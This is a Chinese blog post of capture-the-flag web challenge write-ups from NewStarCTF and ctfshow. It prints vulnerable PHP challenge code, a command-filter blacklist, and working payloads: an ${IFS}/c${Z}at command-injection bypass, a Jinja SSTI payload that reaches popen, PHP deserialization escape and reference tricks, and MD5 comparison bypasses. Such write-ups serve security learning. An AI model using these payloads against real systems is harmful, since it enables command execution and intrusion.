[NewStarCTF 公开赛赛道]

于 2024-04-15 12:07:28 发布
阅读量1.5k 收藏 42
点赞数 31
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wxy_1234_/article/details/137775492
版权

[NewStarCTF 公开赛赛道]So Baby RCE

<?php
error_reporting(0);
if(isset($_GET["cmd"])){
    if(preg_match('/et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|fl|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["cmd"])){
       echo "Don't Hack Me";
    }else{
        system($_GET["cmd"]);
    }
}else{
    show_source(__FILE__);
}

能过滤掉基本都过滤了,其实正则匹配cat直接c${Z}at​可以执行cat,空格可以用${IFS}​绕过。先ls看下当前目录下都有啥文件:/?cmd=ls

 

当前目录没啥好东西,直接ls / 的话 / 这个还被过滤了。那就用cd ..命令一级一级往上找,分号被过滤了就用逻辑与&&连接。看下上一级目录都有啥:

​/?cmd=cd${IFS}..%26%26cd${IFS}..%26%26cd${IFS}..%26%26ls​

连续三次后 得到

flag在ffffllllaaaaggggg文件中

​/?cmd=cd${IFS}..%26%26cd${IFS}..%26%26cd${IFS}..%26%26c${Z}at${IFS}ffff${Z}llllaaaaggggg​

得到flag

 [NewStarCTF 2023 公开赛道]ErrorFlask

传入?number1=1&number2=2

提示为not ssti,flag in source code~3

提示flag在源码
我们修改一下其中一个为字母?number1=a&number2=2,让其出现报错


果然出现了/app/app.py​源码,得到flag

[NewStarCTF 2023 公开赛道]Unserialize?

由于是private成员变量,所以序列化后长度会加2,多两个空白符

<?php
class evil {
    private $cmd;
    function __construct($cmd1){
        $this->cmd=$cmd1;
    }
}

$a=new evil('ls /');
echo serialize($a);
?>

O:4:"evil":1:{s:9:"evilcmd";s:35:"head /th1s_1s_fffflllll4444aaaggggg";}

[NewStarCTF 2023 公开赛道]GenShin

抓包发现secr3tofpop

访问得到please give a name by get

传入{{print(7*7)}}执行不了

过滤了{{}}

?name={%print("".__class__.__bases__[0].__subclasses__()[132].__enter__.__globals__"pop"+"en".read())%}

[NewStarCTF 2023 公开赛道]逃

<?php
class GetFlag {
    public $key;
    public $cmd = "whoami";
    public function __construct($key)
    {
    $this->key = $key;
    }
    public function __destruct()
    {
    system($this->cmd);
    }
}
function filter($str){
    return str_replace("bad","good",$str);
}


$str=new GetFlag('badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:6:"whoami";}','b','c');
$str_1=serialize($str);
$str_2=filter($str_1);
$a=unserialize($str_2);
var_dump($a);


//O:7:"GetFlag":2:{s:3:"key";s:1:"a";s:3:"cmd";s:6:"whoami";}
//O:7:"GetFlag":2:{s:3:"key";s:3:"good";s:3:"cmd";s:6:"whoami";}

传入key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:7:"cat /f*";}

将whoami换为s7:"cat /f*"即可得到flag,并且改变bad的数量

Begin of PHP

<?php
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach(post as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}

?key1=s155964671a&key2=s878926199a&key4[]=1&key5=11111a

key3[]=111&flag5=.

ctfshow

266

<?php
class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
}
$admin =new ctfshow('123','123');

echo serialize($admin);

由于

public function __destruct(){
global $flag;
echo $flag;
}

需要绕过

post传入O:7:"ctfshow":2:{}发现没用

post传入O:7:"ctfshow":2:{ctfshow}也没用

抓包传入O:7:"ctfshow":2:{ctfshow}得到flag

通过恶意破坏反序列化结构,但是不破坏类名

类名存在但是里面的执法序列化失败

265

<?php
class ctfshowAdmin{
public $token;
public $password;

public function __construct($t,$p){
$this->token=$t;
$this->password = &$this->token;
}
public function login(){
return $this->token===$this->password;
}
}

$admin =new ctfshowAdmin('123','123');

echo serialize($admin);

运行代码可拿到pyload

O:12:"ctfshowAdmin":2:{s:5:"token";s:3:"123";s:8:"password";R:2;}

传入ctfshow值即可获得flag

wxy_1234_
关注
  • 31
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[NewStarCTF 公开赛赛道]UnserializeOne
qq_20242529的博客
04-29 206
先将代码复制进vscode,然后把所有和属性无关的删除。将结果以POST请求传给参数POP。这里不知道魔术方法的功能可以看这两个链接。这道题的链路比较好复原,正向逆向都可以。正向复原,图画的比较丑,谅解一下。这道题是反序列pop类型的。
NewStarCTF 公开赛赛道
m0_62129839的博客
10-29 851
reverse一下倒着取得到最后将回显逆转收获无2.文件包含先进行一个代码审计1219893521,伪随机,给了值,爆破出种子就行if语句playload:flag收获base被禁用rot13反序列化,这类题我觉得是我比较薄弱的地方,好好研究研究:poc链我们这样分析,尾链是Sec-> invoke,倒推__invoke() //当脚本尝试将对象调用为函数时触发clone() //当把一个对象赋给另一个对象时自动调用。
CTF之旅WEB篇(4)--NewStarCTF 公开赛IncludeOne详解
shutTD的博客
10-02 788
主要还是考察对新东西的快速理解,还有一些其他的绕过技巧,平时要养成边刷题边把题目里的一些技巧记录下来的好习惯,这样在其他的题目里的绕过才会更得心应手。
NewStarCTF 公开赛-web
qq_61768489的博客
11-22 1921
cookie 修改admin 源码发现key GET和POST传参即可。
NewStarCTF2023
2301_80115097的博客
11-13 388
从Begin的__destruct析构函数作为起点开始,构造POP链触发到WhiteGod的__unset方法,__unset方法中存在一个函数的动态调用,可以实现RCE。由此可以得到剩下的两个信息,index.php文件的page参数存在任意文件包含漏洞,攻击者通过这个漏洞包含pearcmd.php向服务器中写入了名为wh1t3g0d.php的WebShell。发第一个,有回显,第二个,没回显,说明页面可以根据if判断的结果回显两种(真假)内容,因此是布尔盲注。
LFI TO RCE之pearcmd.php的妙用
Aiwin的博客
10-10 2390
LFI TO RCE之pearcmd.php的妙用及NewStarCTF IncludeTwo例题
华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料
09-22
《华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料》 在当今信息化社会,无线局域网(WLAN)已经成为我们日常生活和工作中不可或缺的一部分。华为作为全球领先的ICT解决方案提供商,其主办的“华为中国大学生ICT...
ICT比赛网络赛道题库
12-29
ICT比赛网络赛道题库 为2022年ICT比赛网络赛道题库,提供于ICT网络赛道省级初赛和复赛理论知识部分复习人员使用 一共有1100多道题目,其中大多数为往届题目和华为资格认证的题目,考试的时候是没有原题的,但是可以...
NewStarCTF 2023 第一阶段公开赛道部分wp
10-02
这是官方的wp文件,需要的可以下载查看
第十七届智能车竞赛线上比赛赛道设计草案.pdf
03-09
蓝桥杯,智能汽车比赛,方案,开源,源码,分享
NAIC2021比赛,AI+无线通信赛道初赛.zip
09-12
NAIC2021比赛,AI+无线通信赛道 ### 软件架构 #### Model_define_tf.py 为定义模型的代码,如encoder、decoder、量化层等,提交时就提交这个和训练好的模型权重 #### Model_train.py 为训练模型的代码 #### ...
NewStarCTF 公开赛 第三周学习记录
m0_64815693的博客
10-09 2142
NewStarCTF 公开赛赛道 第三周 wp
NewstarCTF2023 WEB [WEEK3] 题目及思路
2301_76690905的博客
10-23 1250
提示了LFI to RCE,搜相关资料可知然后使用蚁剑链接。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8329
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024年公关服务行业分析报告.pptx
07-09
行业报告
惠州市建筑物矢量数据(Shp格式+带高度).txt
最新发布
07-09
因文件较多,数据存放网盘,txt文件内包含下载链接及提取码,永久有效。失效会第一时间进行补充。
Matlab语言教程及案例
07-09
项目总结 本文详细介绍了Matlab的基础知识和一个完整的数据分析与可视化案例。内容包括: 1. **基本操作**:基本算术运算和矩阵操作。 2. **绘图**:二维和三维绘图。 3. **函数和脚本**:编写和运行Matlab函数和脚本。 4. **案例分析**:生成模拟数据,进行数据预处理、绘图和统计分析。 通过这个项目,读者可以掌握Matlab的基本使用方法,并了解如何在Matlab中进行数据分析和可视化。这对于初学者入门Matlab编程、提升数据处理和分析能力非常有帮助。希望本文能为读者提供有价值的参考,提升其Matlab编程和数据分析技能。
KB8825英文数据手册
07-09
三星KB8825英文数据手册
用python的turtle库画一个曲折的赛车赛道
03-18
使用Python的turtle库可以很方便地画出曲折的赛车赛道。下面是一个示例代码: ```python import turtle # 创建画布和画笔 canvas = turtle.Screen() canvas.bgcolor("white") pen = turtle.Turtle() pen.speed(0) ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值